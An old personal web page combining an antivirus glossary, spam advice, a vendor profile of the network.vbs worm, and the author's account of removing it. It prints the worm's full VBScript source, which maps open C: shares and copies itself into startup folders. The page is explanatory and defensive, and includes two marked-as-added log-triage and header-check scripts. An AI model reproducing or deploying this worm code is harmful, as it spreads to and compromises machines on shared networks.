To have your computer scanned for viruses, just visit www.antivirus.com/ (it's free).
E-MAIL viruses
If you receive an e-mail with an attached file from an unknown source, simply delete it. Viruses and Trojan programs must have code that is executed in order to infect. If you "double-click" an attached file on an e-mail message, you are executing code and may infect your machine. (Note: Newer antivirus software is capable of scanning these attachments before they are opened.)
SPAM
More about Spam is at http://www.antivirus.com/cybercontent/spamFAQ.htm
Do not try to unsubscribe: many spammers use the reply options to confirm the validity of the e-mail address.
Set your filters in Outlook or your e-mail application to file or delete spam-like mail. Try blocking e-mail with words in the header or the body such as "Free" or "Money" or "Sex." Information on filtering can be found at Spam Abuse Net.
Register with Network Abuse Clearinghouse http://abuse.net/ and report all spam through their remailer service.
Forward spam to Trend's spam collectors at spam@trendmicro.com so that they can update filters that block new spam messages.
Glossary of Virus Terms
ActiveX malicious code
Aliases
Boot sector viruses
Date of origin
Description
Destructive viruses
ELF
Encrypted viruses
File infecting viruses
In-the-Wild virus list
Java malicious code
Joke programs
Language
Malware
Macro virus
NE
Password
Payload
PE
Place of origin
Platform
Risk rating
Size
Script viruses
Solution
Tech details
Trigger condition/date
Trojan
Virus types
Worm
ActiveX malicious code
ActiveX controls allow Web developers to create interactive,
dynamic Web pages with broader functionality such as HouseCall,
Trend Micro's free on-line scanner. An ActiveX control is a
component object embedded in a Web page which runs automatically
when the page is viewed. In many cases, the Web browser can be
configured so that these ActiveX controls do not execute by
changing the browser's security settings to "high."
However, hackers, virus writers, and others who wish to cause
mischief or worse may use ActiveX malicious code as a vehicle to
attack the system. To remove malicious ActiveX controls, you just
need to delete them.
Aliases
There is no commonly accepted industry standard for naming
viruses and malicious mobile code. Each may be known by several
different names or aliases. See virus types for an explanation of
Trend Micro virus-naming conventions.
Boot sector viruses
Boot sector viruses infect the boot sector or partition table of
a disk. Computer systems are most likely to be attacked by boot
sector viruses when you boot the system with an infected disk
in the floppy drive - the boot attempt does not have to be
successful for the virus to infect the hard drive. Also, there
are a few viruses that can infect the boot sector from executable
programs - these are known as multipartite viruses and they
are relatively rare. Once the system is infected, the boot sector
virus will attempt to infect every disk that is accessed by that
computer. In general, boot sector viruses can be successfully
removed.
Date of origin
Indicates when a virus was first discovered (if known).
Description
This is a brief summary of a virus listed in the Trend Virus
Encyclopedia. For detailed technical information, click on the
"Tech Details" tab.
Destructive viruses
In addition to self-replication, computer viruses may have a
routine that can deliver the virus payload. A virus is defined as
destructive if its payload does some damage to your system, such
as corrupting or deleting files, formatting your hard drive, or
committing denial-of-service attacks.
ELF
ELF refers to Executable and Link Format, which is the well-documented
and available file format for Linux/UNIX executables. Trend
products detect malicious code for Linux/UNIX as "ELF_Virusname."
Encrypted viruses
Indicates that the virus code contains a special routine that
encrypts the virus body to evade detection by antivirus software.
Trend Micro's antivirus products have the ability to decrypt
the virus body and detect such viruses.
File infecting viruses
File infecting viruses infect executable programs (generally,
files that have extensions of .com or .exe). Most such viruses
simply try to replicate and spread by infecting other host
programs - but some inadvertently destroy the program they infect
by overwriting some of the original code. There is a minority of
these viruses that are very destructive and attempt to format the
hard drive at a pre-determined time or perform some other
malicious action. In many cases, a file-infecting virus can be
successfully removed from the infected file's program. If the
virus has overwritten part of the code, the original file will be
unrecoverable.
In-the-Wild virus list
The In-the-Wild virus list is a list of the most common viruses
that have been found infecting users' computers worldwide.
The list is compiled by the renowned antivirus researcher Joe
Wells. Wells updates the list regularly, working closely with
antivirus research teams around the world, including Trend Micro's.
When ICSA (International Computer Security Association) conducts
virus testing of antivirus products, the In-the-Wild virus list
serves as the basis for its comparative analysis. More info: http://www.wildlist.org
Java malicious code
Java applets allow Web developers to create interactive, dynamic
Web pages with broader functionality. Java applets are small,
portable Java programs embedded in HTML pages. They can run
automatically when the pages are viewed. However, hackers, virus
writers, and others who wish to cause mischief may use Java
malicious code as a vehicle to attack the system. In many cases,
the Web browser can be configured so that these applets do not
execute by changing the browser's security settings to "high."
Joke programs
Joke programs are ordinary executable programs. They are added to
the detection list because they are found to be very annoying and/or
they contain pornographic images. Joke programs cannot spread
unless someone deliberately distributes them. To get rid of a
Joke program, delete the file from your system.
Language
This refers to the language locale of the virus working platform
such as MS Word in English or Chinese.
Malware
Malware is a general term used to refer to any unexpected or
malicious programs or mobile code, such as viruses, Trojans, worms,
or Joke programs.
Macro virus
Macro viruses are viruses that use another application's macro
programming language to distribute themselves. They infect
documents such as MS Word or MS Excel. Unlike other viruses,
macro viruses do not infect programs or boot sectors - although a
few do drop programs on the user's hard drive. The dropped files
may infect executable programs or boot sectors. Macro viruses can
be removed safely from the infected document using Trend Micro's
antivirus products.
Special note: Occasionally, you may get an "illegal
operation" error when you try to start MS Word after
cleaning a Word macro virus. If this happens, search for the file
"normal.dot" and rename it to "normaldot.bak."
MS Word will generate a new, clean "normal.dot" the
next time it is started. This problem occurs because some viruses
can leave harmless code residue that MS Word may be reading
incorrectly, causing erratic behavior. Trend antivirus software
only removes malicious viral code and not user-created macros.
NE
NE refers to New Executable, which is the standard Windows 16-bit
executable file format. Windows 16-bit viruses are detected by
Trend products as "NE_Virusname."
Password
Some viruses set a password when they infect a document. The main
objective of the virus here is to make the document inaccessible.
This password can be a word, phrase, or even a randomly generated
number.
Payload
A virus payload is an action it performs on the infected
computer. This can be something relatively harmless like showing
messages or ejecting the CD drive, or something destructive like
deleting the entire hard drive.
PE
PE refers to Portable Executable, which is the standard Win32
executable file format. Windows 32-bit viruses are detected by
Trend products as "PE_Virusname."
Place of origin
Indicates where a virus is believed to have originated (if known).
Platform
Indicates the computer operating system or application on which a
virus can run and perform an infection. Generally, a particular
operating system is required for executable viruses and a
specific application is needed for macro viruses.
Risk rating
The risk rating of a virus is an assessment of the threat posed
by a virus. It is based on a number of different factors
including, but not limited to, its potential to spread, the
destructiveness of its payload, and the actual number of cases
reported.
Size of macro/malicious code/virus
Indicates the size of the virus code in bytes. This number is
sometimes used as part of the virus name to distinguish it from
its variants.
Script viruses (VBScript, JavaScript, HTML)
Script viruses are written in script programming languages, such
as VBScript and JavaScript. VBScript (Visual Basic Script) and
JavaScript viruses make use of Microsoft's Windows Scripting Host
to activate themselves and infect other files. Since Windows
Scripting Host is available on Windows 98 and Windows 2000, the
viruses can be activated simply by double-clicking the *.vbs or *.js
file from Windows Explorer.
HTML viruses use the scripts embedded in HTML files to do their
damage. These embedded scripts automatically execute the moment
the HTML page is viewed from a script-enabled browser.
Solution
Most viruses can be cleaned or removed from the infected host
files by Trend's antivirus software. Special removal
instructions are provided for viruses or Trojans that modify the
system registry and/or drop files. Generally, to remove Trojans
or Joke programs, you just need to delete the program files - no
cleaning action is needed.
For a quick check-up of your PC, use HouseCall - Trend Micro's
FREE on-line virus scanner. This will check for viruses which may
already be on your PC.
To keep your computer healthy by catching viruses before they
have a chance to infect your PC or network, get the best
antivirus solution available today. Trend Micro offers antivirus
and content security solutions for home users, corporate users,
and ISPs.
Technical details
The "technical details" section of a Virus Encyclopedia
profile contains specific information about the actions performed
by a virus on the host system. This information is provided to
assist system administrators in identifying and removing viruses.
Home users should use an automated tool like Trend PC-cillin or
Trend's FREE online scanner HouseCall to
detect and remove viruses from their computer.
Trigger condition or date
This is to indicate the condition or date on which the virus
payload will be triggered. Please note that date-activated
viruses may infect your computer 365 days a year. Your computer
may be infected by these viruses prior to the date specified.
Trojan
A Trojan horse is a program that performs some unexpected or
unauthorized, usually malicious, actions such as displaying
messages, erasing files or formatting a disk. A Trojan horse
doesn't infect other host files, thus cleaning is not
necessary. To get rid of a Trojan, simply delete the program.
Virus types
Viruses and other malware are classified into various types
depending on their file formats and infection routines. To
distinguish among these types, Trend Micro uses the following
prefixes:
ActiveX malicious code - ATVX
Boot sector viruses - no prefix
COM and EXE file infectors - PE, NE, or no prefix
Executable and Link format - ELF
Joke programs - JOKE
Java malicious code - JAVA
Macro viruses - W2KM, W97M, X97M, P97M, A97M, WM, XM, V5M
Trojan horses - TROJ
VBScript, JavaScript or HTML viruses - VBS, JS, HTML
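As an added example (not code from the original page or from Trend Micro), the Python below tells the three executable formats named above apart by their header bytes, which is the basis on which a detection is filed under the ELF_, PE_ or NE_ family; the sample images are constructed inside the code and are not real programs.

```python
import struct

ELF_MAGIC = b"\x7fELF"   # first four bytes of every ELF image
MZ_MAGIC = b"MZ"         # DOS header shared by plain DOS, NE and PE files


def detection_prefix(data: bytes) -> str:
    """Return the format family (ELF, PE, NE, MZ) of an executable image,
    or 'unknown'. Only header bytes are inspected; nothing is executed."""
    if data.startswith(ELF_MAGIC):
        return "ELF"
    if not data.startswith(MZ_MAGIC) or len(data) < 0x40:
        return "unknown"
    # e_lfarlc (offset 0x18) is the relocation-table offset. Windows treats a
    # file as a plain DOS program unless it is at least 0x40, i.e. past the
    # classic 64-byte header where the extended fields live.
    (e_lfarlc,) = struct.unpack_from("<H", data, 0x18)
    if e_lfarlc < 0x40:
        return "MZ"
    # e_lfanew (offset 0x3C) points at the "new" header: "PE\0\0" for Win32
    # Portable Executable, "NE" for 16-bit New Executable.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return "MZ"          # pointer runs off the end: treat as DOS/truncated
    sig = data[e_lfanew:e_lfanew + 4]
    if sig == b"PE\0\0":
        return "PE"
    if sig[:2] == b"NE":
        return "NE"
    return "MZ"


def build_mz_image(new_header_sig: bytes) -> bytes:
    """Constructed test image, not a real program: a 64-byte DOS header with
    e_lfarlc = 0x40 and e_lfanew pointing just past it, then the new header."""
    hdr = bytearray(0x40)
    hdr[0:2] = MZ_MAGIC
    struct.pack_into("<H", hdr, 0x18, 0x40)   # e_lfarlc
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew
    return bytes(hdr) + new_header_sig + b"\0" * 28


if __name__ == "__main__":
    samples = {
        "win32 sample": build_mz_image(b"PE\0\0"),
        "win16 sample": build_mz_image(b"NE\0\0"),
        "linux sample": ELF_MAGIC + b"\0" * 60,
        "dos sample": MZ_MAGIC + b"\0" * 62,
        "shell script": b"#!/bin/sh\necho hi\n",
    }
    for name, image in samples.items():
        print(f"{name:13} -> {detection_prefix(image)}")
```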
Worm
A computer worm is a self-contained program (or set of programs)
that is able to spread functional copies of itself or its
segments to other computer systems. The propagation usually takes
place via network connections or email attachments. To get rid of
a worm you just need to delete the program.
A HARMLESS TEST VIRUS
The EICAR Standard Antivirus Test File can be downloaded from http://www.antivirus.com/vinfo/testfiles/
The EICAR organization or European Institute of Computer Anti-virus Research, along with antivirus vendors, has developed this test file to assist users in testing their installations of antivirus software. It is recommended that vendors detect this file.
This is NOT A VIRUS. The file is a test file which may be used to test antivirus software. The code is harmless and when detected properly the virus scanner will display the following message: EICAR-TEST-FILE
HOW I REMOVED A VIRUS FROM MY COMPUTER
A free scan of my computer by www.antivirus.com found on the C:/ drive of my computer a "Non Cleanable" virus in the following three directories:
I found an identical virus file in all three of the above directories and deleted them after I edited one with Notepad to view its English-language code.
The following information about the network.vbs virus came from www.netvirus.com
VBS_NETLOG.WORM
Risk rating:
Virus type: VBScript
Destructive: N
Aliases:
NETLOG.WORM , NETWORK.VBS
Description:
When run, this Trojan searches for a computer on the network where
c:\ is shared with full control and accesses its files. This virus
does not run in a Windows NT environment.
Solution:
Please delete the file "network.vbs" located in
directories where it was added. You may also disconnect mapping
of the network drive to ensure complete safety.
If you need further assistance with this solution, please send an
email to virus_doctor@trendmicro.com.
Trend Micro offers best-of-breed antivirus and content-security
solutions for your corporate network or home PC.
VBS_NETLOG.WORM (continued from profile page)
In the wild: Yes
Trigger date 1: Any Day
Payload 1: Others (drops files in directories)
Payload 2: Others (accesses files with full shared control in network)
Detected by pattern file#: 659
Detected by scan engine#: 2.082
Language: English
Platform: Windows
Encrypted: No
Size of virus: 2,429 Bytes
Details:
Upon execution, this Trojan checks for the file network.log
in the c:\ drive, then it writes the text "Log file Open"
to this file. It then writes to this log file random addresses
with the text:
Subnet : <Random number 1>.<Random number 2>.<Random number 3>.0
where:
Random number 1 is a number between 199 and 214
Random number 2 and Random number 3 are numbers between 1 and 254
Then the malware picks a random address for it to scan. After
this, the virus checks for a computer in a network wherein the
shared format of c:\ is full control. It then maps that
computer's shared c:\ as drive j:\.
The Trojan also adds the following line to the log file network.log
for every drive it has mapped:
Copying files to : <share name>
and checks the first network.vbs file it copies and then writes
to the log:
Successful copy to : <share name>
if the copy is successful.
After mapping c:\ to j:\, it copies the file network.vbs to the
following locations:
J:\windows\startm~1\programs\startup\
J:\windows\
J:\windows\start menu\programs\startup\
J:\win95\start menu\programs\startup\
J:\win95\startm~1\programs\startup\
J:\win95\
When the infected computer reboots, the virus runs because it is
at the startup directory. With this the hacker can access all the
files in c:\.
The form of lookup used by this worm can also act as a Distributed
Denial of Service (DDoS) attack, since the queries the virus
performs can overwhelm a server until requests can no longer be
serviced, thereby crashing the system.
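The network.log format described above is enough for a quick incident triage: which subnets the infected machine probed, which shares it tried to write network.vbs to, and which of those copies succeeded (the hosts it actually spread to). The Python below is an added example, not the page's or Trend Micro's code; the sample log is constructed from the line formats in the description and its host addresses are made up.

```python
import re

# Line formats taken from the VBS_NETLOG.WORM description above. The worm's
# own code spells it "Successfull", so accept one or more trailing l's.
SUBNET_RE = re.compile(r"^Subnet : (\d+)\.(\d+)\.(\d+)\.0$")
COPY_RE = re.compile(r"^Copying files to : (\\\\[\d.]+\\C)$")
SUCCESS_RE = re.compile(r"^Successful+ copy to : (\\\\[\d.]+\\C)$")

# Constructed sample log (not from a real machine): two probed subnets, two
# copy attempts, one of which succeeded.
SAMPLE_LOG = r"""Log file Open
Subnet : 204.235.96.0
Copying files to : \\204.235.96.17\C
Successfull copy to : \\204.235.96.17\C
Copying files to : \\204.235.96.90\C
Subnet : 214.236.191.0
"""


def triage_network_log(text: str) -> dict:
    """Summarise a network.log written by VBS_NETLOG.WORM."""
    subnets, attempted, spread = [], [], []
    header_seen = False
    for line in text.splitlines():
        line = line.strip()
        if line == "Log file Open":
            header_seen = True
        elif (m := SUBNET_RE.match(line)):
            subnets.append(tuple(int(x) for x in m.groups()))
        elif (m := COPY_RE.match(line)):
            attempted.append(m.group(1))
        elif (m := SUCCESS_RE.match(line)):
            spread.append(m.group(1))
    # The description says the first octet is drawn from 199-214 (the worm's
    # code does this for its first 50 subnets), so an early entry outside that
    # window means the log was not produced by this variant.
    early_octets = [s[0] for s in subnets[:50]]
    in_window = all(199 <= o <= 214 for o in early_octets)
    return {
        "is_netlog_format": header_seen,
        "subnets_probed": len(subnets),
        "early_octets_in_199_214": in_window,
        "copies_attempted": attempted,
        "hosts_spread_to": spread,   # shares that now hold network.vbs
    }


if __name__ == "__main__":
    for key, value in triage_network_log(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The hosts_spread_to list is the set of machines that also need cleaning, since each now carries network.vbs in its startup folders.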
HouseCall informed me it could not access the files listed below. Please note that there is the potential of virus infection in files HouseCall cannot scan
(I just left some of these files alone because I was not sure what would happen to my computer if I deleted them.)
File Name | Type | Message |
C:\WINDOWS\HELP\windows.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\WINDOWS\WIN386.SWP | File | Fail to scan file (-94,Open file for data reading error) |
C:\Program Files\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\Juno\lib\CONTACT.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\NetZero\lib\bwt300.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\bwt300.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\Zcast1_6.zip *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\JavaSoft\JRE\1.2\lib\plugprov.jar *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\ANCESTRY\LYLES\MAILTEXT\allofus.zip ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\3\NEW\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\America Online 5.0\aol.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWSWinHlp32.BMK | File | Fail to scan file (-89,Skip this file) |
HOW I VIEWED THE INTERNAL STRUCTURE OF THE VIRUS HOUSECALL FOUND ON MY COMPUTER
After I transferred one copy of the three identical 237KB VBScript files named "network.vbs" to a folder I named VIRUS in my Documents folder, I right-clicked on the file name "network.vbs" with my mouse to view its Properties. I changed the Property of the file from Read Only so I could edit it with Notepad (Properties also revealed that the "network.vbs" virus file was created on September 28, 1999 and modified Sunday, January 9, 2000). After I examined the contents of the file, I deleted them and then deleted the file, which contained the following instructions (which might be used to recreate the virus).
dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
randomize
checkfile()
randaddress()
do
    do while driveconnected = "0"
        checkaddress()
        shareformat()
        wshnetwork.mapnetworkdrive "j:", sharename
        enumdrives()
    loop
    copyfiles()
    disconnectdrive()
loop
msgbox "Done"

function disconnectdrive()
    wshnetwork.removenetworkdrive "j:"
    driveconnected = "0"
end function

function createlogfile()
    Set myfile = fso1.createtextfile("c:\network.log", True)
end function

function checkfile()
    If (fso1.fileexists("c:\network.log")) then
        fso1.deletefile("c:\network.log")
        createlogfile()
    else
        createlogfile()
    end If
    myfile.writeLine("Log file Open")
end function

function copyfiles()
    myfile.writeline("Copying files to : " & sharename)
    Set fso = CreateObject("scripting.filesystemobject")
    fso.copyfile "c:\network.vbs", "j:\"
    If (fso2.FileExists("j:\network.vbs")) Then
        myfile.writeline("Successfull copy to : " & sharename)
    End If
    fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
    fso.copyfile "c:\network.vbs", "j:\windows\"
    fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
    fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
    fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
    fso.copyfile "c:\network.vbs", "j:\wind95\"
end function

function checkaddress()
    octd = octd + 1
    if octd = "255" then randaddress()
end function

function shareformat()
    sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

function enumdrives()
    Set odrives = wshnetwork.enumnetworkdrives
    For i = 0 to odrives.Count -1
        if sharename = odrives.item(i) then
            driveconnected = 1
        else
            ' driveconnected = 0
        end if
    Next
end function

function randum()
    rand = int((254 * rnd) + 1)
end function

function randaddress()
    if count <50 then
        octa=Int((16) * Rnd + 199)
        count=count + 1
    else
        randum()
        octa= rand
    end if
    randum()
    octb=rand
    randum()
    octc=rand
    octd="1"
    myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function
WHAT THE VIRUS DID TO MY COMPUTER
My C:\network.log file contained the information below, some or all of which was written there by the virus program, according to the description above. I opened the file in Notepad and changed its attribute from "Archive" to see if I could delete any of the following information (not that I need to), but failed (maybe the MS-DOS editor could change it).
Log file Open